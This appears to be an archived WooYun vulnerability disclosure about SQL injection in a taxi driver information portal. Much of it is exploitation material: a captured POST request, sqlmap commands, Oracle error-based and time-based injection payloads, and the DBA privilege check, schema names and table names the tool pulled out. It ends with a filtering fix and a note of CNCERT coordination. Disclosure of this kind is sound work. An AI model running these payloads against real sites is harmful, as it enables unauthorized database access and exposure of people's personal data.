乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-16: 细节已通知厂商并且等待厂商处理中 2015-10-20: 厂商已经确认,细节仅向厂商公开 2015-10-30: 细节向核心白帽子及相关领域专家公开 2015-11-09: 细节向普通白帽子公开 2015-11-19: 细节向实习白帽子公开 2015-12-04: 细节向公众公开
妈妈再也不用担心我打不到车了。
问题url: http://**.**.**.**/WebPortal/DriverInfo.aspx?cid=F973F6861D000905姓名查询出输入' 报错
输入' and '1'=1 显示正常
提交正常参数用burpsuit抓包,内容为:
POST /WebPortal/DriverInfo.aspx?cid=F973F6861D000905 HTTP/1.1Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Referer: http://**.**.**.**/WebPortal/DriverInfo.aspx?cid=F973F6861D000905Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.3)Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: **.**.**.**Content-Length: 2132Pragma: no-cacheCookie: ASP.NET_SessionId=tfbe5un5qvbejnfbrj0i2355; BIGipServerpool_czcweb=4184123584.17695.0000__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTgyNDM4OTMwNA9kFgICAw9kFgoCAQ9kFgQCAQ8WAh4LXyFJdGVtQ291bnQCBxYOZg9kFgJmDxUDFC9XZWJQb3J0YWwvTmV3cy5hc3B4EEFBNjNENTgwOEI4NDYzNDMM6KGM5Lia6LWE6K6vZAIBD2QWAmYPFQMWL1dlYlBvcnRhbC9QdWJsaWMuYXNweBAxODZGRDFDN0MwRjVGQTAzDOS%2FoeaBr%2BWFrOW8gGQCAg9kFgJmDxUDFi9XZWJQb3J0YWwvUG9saWN5LmFzcHgQMzY1ODVFOENDOTgxMDRFNAzmlL%2FnrZbotYTorq9kAgMPZBYCZg8VAxcvV2ViUG9ydGFsL0NvbXBhbnkuYXNweBBFNUYyMUE3RkIzQkRGNkQ1DOS8geS4muS%2FoeaBr2QCBA9kFgJmDxUDHC9XZWJQb3J0YWwvRXhwb3N1cmVMaXN0LmFzcHgQQ0RBRDZDQzI5MjVGQzMwNAzooYzkuJrnm5HnnaNkAgUPZBYCZg8VAyEvV2ViUG9ydGFsL1dvcmtQcm9jZXNzZXNMaXN0LmFzcHgQMjY2Nzk0RUQ3NTc3NjAzMgzmnI3liqHmjIfljZdkAgYPZBYCZg8VAygvV2ViUG9ydGFsL1BvbGl0aWNhbEludGVyYWN0aW9uTGlzdC5hc3B4EEU5NUZDQkREMDJCREIzNTUM5pS%2F5rCR5LqS5YqoZAIDD2QWBAIBD2QWBAIDDw8WBB4EVGV4dAUM5LyB5Lia5L%2Bh5oGvHgtQb3N0QmFja1VybAUsL1dlYlBvcnRhbC9Db21wYW55LmFzcHg%2FbWlkPUU1RjIxQTdGQjNCREY2RDVkZAIHDw8WBB8BBQ%2Fpqb7pqbblkZjkv6Hmga8fAgUvL1dlYlBvcnRhbC9Ecml2ZXJJbmZvLmFzcHg%2FY2lkPUY5NzNGNjg2MUQwMDA5MDVkZAIFDw9kFgIeB29uY2xpY2sFGXRoaXMuZm9ybS50YXJnZXQ9J19ibGFuaydkAgMPZBYCAgEPFgIfAAIEFghmD2QWAmYPFQMXL1dlYlBvcnRhbC9Db21wYW55LmFzcHgQQTc1NkM4NDNEREIzNEVDNAzkvIHkuJrkv6Hmga9kAgEPZBYCZg8VAxcvV2ViUG9ydGFsL0NhckluZm8uYXNweBBCM0QzNUE0MzE2Qjg5RERCDOi9pui%2BhuS%2FoeaBr2QCAg9kFgJmDxUDGi9XZWJQb3J0YWwvRHJpdmVySW5mby5hc3B4EEY5NzNGNjg2MUQwMDA5MDUP6am%2B6am25ZGY5L%2Bh5oGvZAIDD2QWAmYPFQMUL1dlYlBvcnRhbC9OZXdzLmFzcHgQMjMzNDI2QjIxQjZFQUU0OAzkvIHkuJrliqjmgIFkAgUPDxYCHwEFD%2BmpvumptuWRmOS%2FoeaBr2RkAgsPFgIfAAL%2F%2F%2F%2F%2FD2QCDQ8PFgQeC1JlY29yZGNvdW50Zh4QQ3VycmVudFBhZ2VJbmRleAIBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFE1VDSGVhZGVyMSRidG5TZWFyY2gFCmlidG5TZWFyY2ig6pRqHLsAuX6WFCToA5yx7ue44g%3D%3D&__VIEWSTATEGENERATOR=8AD57CE5&__PREVIOUSPAGE=zULTs4igG4EFeearFv2MiamY3Qlgyn8e1WDGVnSvYvLDp3NInABujMndM12mAmKShhZF-P2VPrwHBDHZfe8bxt7-kAu8aaXRhsfWJJb4chH-JWTR0&__EVENTVALIDATION=%2FwEWCAKdodnEAgKemcGGBgL0sL7KDQLZtY%2FGAwL6iuvMDAK4kLvqAgLRqb%2BCAQKPnrNoO%2F6cSo%2BN7RscJYLcgsS6WewNzT4%3D&UCHeader1%24keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9C%E7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97&txtDriverName=123&ibtnSearch.x=25&ibtnSearch.y=13
用sqlmap跑一下;数据库用户名DB 权限为DBA
C:\Python27\sqlmap1.0\sqlmap>sqlmap.py -r d:\5.txt --current-user --is-dba _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150915}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not resposible for any misuse or damage caused by this program[*] starting at 23:54:07d:\5.txt[23:54:07] [INFO] parsing HTTP request from 'd:\5.txt'd:\5.txt[23:54:07] [WARNING] provided value for parameter '__EVENTTARGET' is empty. Plese, always use only valid parameter values so sqlmap could be able to run propely[23:54:07] [WARNING] provided value for parameter '__EVENTARGUMENT' is empty. Pease, always use only valid parameter values so sqlmap could be able to run proerly[23:54:07] [INFO] resuming back-end DBMS 'oracle'[23:54:07] [INFO] testing connection to the target URL[23:54:07] [INFO] heuristically checking if the target is protected by some kin of WAF/IPS/IDS[23:54:08] [INFO] it appears that the target is not protectedsqlmap identified the following injection points with a total of 0 HTTP(s) requsts:---Parameter: txtDriverName (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTgyNDM4OTMwNAkFgICAw9kFgoCAQ9kFgQCAQ8WAh4LXyFJdGVtQ291bnQCBxYOZg9kFgJmDxUDFC9XZWJQb3J0YWwvTm3cy5hc3B4EEFBNjNENTgwOEI4NDYzNDMM6KGM5Lia6LWE6K6vZAIBD2QWAmYPFQMWL1dlYlBvcnRhbCQdWJsaWMuYXNweBAxODZGRDFDN0MwRjVGQTAzDOS/oeaBr+WFrOW8gGQCAg9kFgJmDxUDFi9XZWJQb30YWwvUG9saWN5LmFzcHgQMzY1ODVFOENDOTgxMDRFNAzmlL/nrZbotYTorq9kAgMPZBYCZg8VAxcvV2iUG9ydGFsL0NvbXBhbnkuYXNweBBFNUYyMUE3RkIzQkRGNkQ1DOS8geS4muS/oeaBr2QCBA9kFgJmDxDHC9XZWJQb3J0YWwvRXhwb3N1cmVMaXN0LmFzcHgQQ0RBRDZDQzI5MjVGQzMwNAzooYzkuJrnm5HnnakAgUPZBYCZg8VAyEvV2ViUG9ydGFsL1dvcmtQcm9jZXNzZXNMaXN0LmFzcHgQMjY2Nzk0RUQ3NTc3NjzMgzmnI3liqHmjIfljZdkAgYPZBYCZg8VAygvV2ViUG9ydGFsL1BvbGl0aWNhbEludGVyYWN0aW9uTGzdC5hc3B4EEU5NUZDQkREMDJCREIzNTUM5pS/5rCR5LqS5YqoZAIDD2QWBAIBD2QWBAIDDw8WBB4EVG4dAUM5LyB5Lia5L+h5oGvHgtQb3N0QmFja1VybAUsL1dlYlBvcnRhbC9Db21wYW55LmFzcHg/bWlkPU1RjIxQTdGQjNCREY2RDVkZAIHDw8WBB8BBQ/pqb7pqbblkZjkv6Hmga8fAgUvL1dlYlBvcnRhbC9Ecm2ZXJJbmZvLmFzcHg/Y2lkPUY5NzNGNjg2MUQwMDA5MDVkZAIFDw9kFgIeB29uY2xpY2sFGXRoaXMuZmybS50YXJnZXQ9J19ibGFuaydkAgMPZBYCAgEPFgIfAAIEFghmD2QWAmYPFQMXL1dlYlBvcnRhbC9Db2wYW55LmFzcHgQQTc1NkM4NDNEREIzNEVDNAzkvIHkuJrkv6Hmga9kAgEPZBYCZg8VAxcvV2ViUG9ydGsL0NhckluZm8uYXNweBBCM0QzNUE0MzE2Qjg5RERCDOi9pui+huS/oeaBr2QCAg9kFgJmDxUDGi9XZWQb3J0YWwvRHJpdmVySW5mby5hc3B4EEY5NzNGNjg2MUQwMDA5MDUP6am+6am25ZGY5L+h5oGvZAIDD2WAmYPFQMUL1dlYlBvcnRhbC9OZXdzLmFzcHgQMjMzNDI2QjIxQjZFQUU0OAzkvIHkuJrliqjmgIFkAgPDxYCHwEFD+mpvumptuWRmOS/oeaBr2RkAgsPFgIfAAL/////D2QCDQ8PFgQeC1JlY29yZGNvdW50ZhQQ3VycmVudFBhZ2VJbmRleAIBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFE1DSGVhZGVyMSRidG5TZWFyY2gFCmlidG5TZWFyY2ig6pRqHLsAuX6WFCToA5yx7ue44g==&__VIEWSTAEGENERATOR=8AD57CE5&__PREVIOUSPAGE=zULTs4igG4EFeearFv2MiamY3Qlgyn8e1WDGVnSvYvLD3NInABujMndM12mAmKShhZF-P2VPrwHBDHZfe8bxt7-kAu8aaXRhsfWJJb4chH-JWTR0&__EVENTVALDATION=/wEWCAKdodnEAgKemcGGBgL0sL7KDQLZtY/GAwL6iuvMDAK4kLvqAgLRqb+CAQKPnrNoO/6co+N7RscJYLcgsS6WewNzT4=&UCHeader1$keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9CE7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97&txtDriverName=123' AND 9063=(SELECT UPPER(XLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(106)||CHR(112)||CHR(113)||(SELET (CASE WHEN (9063=9063) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(06)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'RaDy'='RaDy&ibtnSearch.x=25&btnSearch.y=13 Type: AND/OR time-based blind Title: Oracle OR time-based blind Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTgyNDM4OTMwNAkFgICAw9kFgoCAQ9kFgQCAQ8WAh4LXyFJdGVtQ291bnQCBxYOZg9kFgJmDxUDFC9XZWJQb3J0YWwvTm3cy5hc3B4EEFBNjNENTgwOEI4NDYzNDMM6KGM5Lia6LWE6K6vZAIBD2QWAmYPFQMWL1dlYlBvcnRhbCQdWJsaWMuYXNweBAxODZGRDFDN0MwRjVGQTAzDOS/oeaBr+WFrOW8gGQCAg9kFgJmDxUDFi9XZWJQb30YWwvUG9saWN5LmFzcHgQMzY1ODVFOENDOTgxMDRFNAzmlL/nrZbotYTorq9kAgMPZBYCZg8VAxcvV2iUG9ydGFsL0NvbXBhbnkuYXNweBBFNUYyMUE3RkIzQkRGNkQ1DOS8geS4muS/oeaBr2QCBA9kFgJmDxDHC9XZWJQb3J0YWwvRXhwb3N1cmVMaXN0LmFzcHgQQ0RBRDZDQzI5MjVGQzMwNAzooYzkuJrnm5HnnakAgUPZBYCZg8VAyEvV2ViUG9ydGFsL1dvcmtQcm9jZXNzZXNMaXN0LmFzcHgQMjY2Nzk0RUQ3NTc3NjzMgzmnI3liqHmjIfljZdkAgYPZBYCZg8VAygvV2ViUG9ydGFsL1BvbGl0aWNhbEludGVyYWN0aW9uTGzdC5hc3B4EEU5NUZDQkREMDJCREIzNTUM5pS/5rCR5LqS5YqoZAIDD2QWBAIBD2QWBAIDDw8WBB4EVG4dAUM5LyB5Lia5L+h5oGvHgtQb3N0QmFja1VybAUsL1dlYlBvcnRhbC9Db21wYW55LmFzcHg/bWlkPU1RjIxQTdGQjNCREY2RDVkZAIHDw8WBB8BBQ/pqb7pqbblkZjkv6Hmga8fAgUvL1dlYlBvcnRhbC9Ecm2ZXJJbmZvLmFzcHg/Y2lkPUY5NzNGNjg2MUQwMDA5MDVkZAIFDw9kFgIeB29uY2xpY2sFGXRoaXMuZmybS50YXJnZXQ9J19ibGFuaydkAgMPZBYCAgEPFgIfAAIEFghmD2QWAmYPFQMXL1dlYlBvcnRhbC9Db2wYW55LmFzcHgQQTc1NkM4NDNEREIzNEVDNAzkvIHkuJrkv6Hmga9kAgEPZBYCZg8VAxcvV2ViUG9ydGsL0NhckluZm8uYXNweBBCM0QzNUE0MzE2Qjg5RERCDOi9pui+huS/oeaBr2QCAg9kFgJmDxUDGi9XZWQb3J0YWwvRHJpdmVySW5mby5hc3B4EEY5NzNGNjg2MUQwMDA5MDUP6am+6am25ZGY5L+h5oGvZAIDD2WAmYPFQMUL1dlYlBvcnRhbC9OZXdzLmFzcHgQMjMzNDI2QjIxQjZFQUU0OAzkvIHkuJrliqjmgIFkAgPDxYCHwEFD+mpvumptuWRmOS/oeaBr2RkAgsPFgIfAAL/////D2QCDQ8PFgQeC1JlY29yZGNvdW50ZhQQ3VycmVudFBhZ2VJbmRleAIBZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFE1DSGVhZGVyMSRidG5TZWFyY2gFCmlidG5TZWFyY2ig6pRqHLsAuX6WFCToA5yx7ue44g==&__VIEWSTAEGENERATOR=8AD57CE5&__PREVIOUSPAGE=zULTs4igG4EFeearFv2MiamY3Qlgyn8e1WDGVnSvYvLD3NInABujMndM12mAmKShhZF-P2VPrwHBDHZfe8bxt7-kAu8aaXRhsfWJJb4chH-JWTR0&__EVENTVALDATION=/wEWCAKdodnEAgKemcGGBgL0sL7KDQLZtY/GAwL6iuvMDAK4kLvqAgLRqb+CAQKPnrNoO/6co+N7RscJYLcgsS6WewNzT4=&UCHeader1$keywords=%E8%AF%B7%E8%BE%93%E5%85%A5%E6%90%9CE7%B4%A2%E5%85%B3%E9%94%AE%E5%AD%97&txtDriverName=-6174' OR 1375=DBMS_PIPE.RECEVE_MESSAGE(CHR(108)||CHR(118)||CHR(100)||CHR(115),5) AND 'vvDv'='vvDv&ibtnSearc.x=25&ibtnSearch.y=13---[23:54:08] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Oracle[23:54:08] [INFO] fetching current user[23:54:08] [INFO] resumed: DBcurrent user: 'DB'[23:54:08] [INFO] testing if current user is DBAcurrent user is DBA: True
查看下当前的库
[23:56:03] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Oracle[23:56:03] [WARNING] schema names are going to be used on Oracle for enumeratio as the counterpart to database names on other DBMSes[23:56:03] [INFO] fetching database (schema) names[23:56:03] [INFO] the SQL query used returns 12 entries[23:56:03] [INFO] resumed: CYZGDB[23:56:03] [INFO] resumed: DB[23:56:03] [INFO] resumed: DBSNMP[23:56:03] [INFO] resumed: EXFSYS[23:56:03] [INFO] resumed: OUTLN[23:56:03] [INFO] resumed: SYS[23:56:03] [INFO] resumed: SYSMAN[23:56:03] [INFO] resumed: SYSTEM[23:56:03] [INFO] resumed: TESTDB[23:56:03] [INFO] resumed: TPMANAGER[23:56:03] [INFO] resumed: TSMSYS[23:56:03] [INFO] resumed: WMSYSavailable databases [12]:[*] CYZGDB[*] DB[*] DBSNMP[*] EXFSYS[*] OUTLN[*] SYS[*] SYSMAN[*] SYSTEM[*] TESTDB[*] TPMANAGER[*] TSMSYS[*] WMSYS
进一步查询库CYZGDB中的表,表很多,只截取部分
Database: CYZGDB[64 tables]+--------------------------+| BASEDEPARTMENT || BASEEXCEPTION || BASEITEMDETAILS || BASEITEMS || BASELOG || BASEMODULE || BASEOBJECTPERMISSION || BASEPARAM || BASEPERMISSION || BASEROLE || BASESEQ || BASEUSER || BASEUSERPARAM || BASEUSERPROJECT || BASEUSERROLE || CLIENT_TAXT_NOTICE || TABLE_YEAR_SEQID || TAXI_APPLYEXAM || TAXI_CANCELSTATIS || TAXI_CONCOMPANY || TAXI_CONPLANCHECK || TAXI_CONTEACHERS || TAXI_CONTINUESTUDY || TAXI_CONTINUESTUDY2 || TAXI_COSTFEE || TAXI_COURSEID || TAXI_DRIVER || TAXI_EXAMFEE || TAXI_EXAMPLAN || TAXI_EXCHAGEEAXM || TAXI_EXCHAGETERM || TAXI_FAILSCORESTUDENT || TAXI_IPRECORD || TAXI_LINK || TAXI_LOGOUTSTUDENT || TAXI_NOTREAINREG || TAXI_OUTLINE || TAXI_PHOTO || TAXI_PLANT || TAXI_QUALITYAPPLY || TAXI_QUALITYREG || TAXI_REGISTRATION || TAXI_STUDENTLEARNLIST || TAXI_STUDENT_DATE || TAXI_STUDYCONDITION || TAXI_STUNDENTINFO_IMPORT || TAXI_STUNDENTPRINTLOG || TAXI_TEACHERINFO || TAXI_TRAINREQUEST || TAXT_REGQUALITYDATA || TAXT_STUNDENTDATA || TEMPAPPLYEXAMNOTRAIN || TEMPAPPLYEXAMSTULEARN || TEMPAPPLYMAKEUPINFO || TEMPAUDITINGAPPLYEXAM || TEMPAUDITINGEXAMNOTRAIN || TEMPAUDITINGEXAMSTULEARN || TEMPEXAMPLAN || TEMPMAKEUPINFO || TEMPNOTRAINSTUINFO || TEMPQUALITYAPPLY || TEMPREGISTINFO || TEMPSTULEARNINFO || TEMPTRAINPLANINFO |+--------------------------+
查询表TAXI_DRIVER中的内容:
数据量很大,只截取了部分,还有其它表都没看,内容也不少!
已证明!
参数过滤!
危害等级:中
漏洞Rank:9
确认时间:2015-10-20 16:34
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发陕西分中心,由其后续协调网站管理单位处置。
暂无